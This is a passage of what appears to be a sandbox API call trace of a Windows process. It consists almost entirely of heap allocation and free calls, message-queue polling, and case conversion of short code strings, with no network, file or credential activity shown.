(in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0199.305] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0199.306] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0199.306] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0199.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0199.315] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0199.315] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.315] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0199.315] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0199.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0199.315] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0199.316] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0199.316] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.317] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.317] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0199.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0199.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0199.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0199.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0199.318] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0199.318] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0199.318] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0199.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0199.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0199.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: 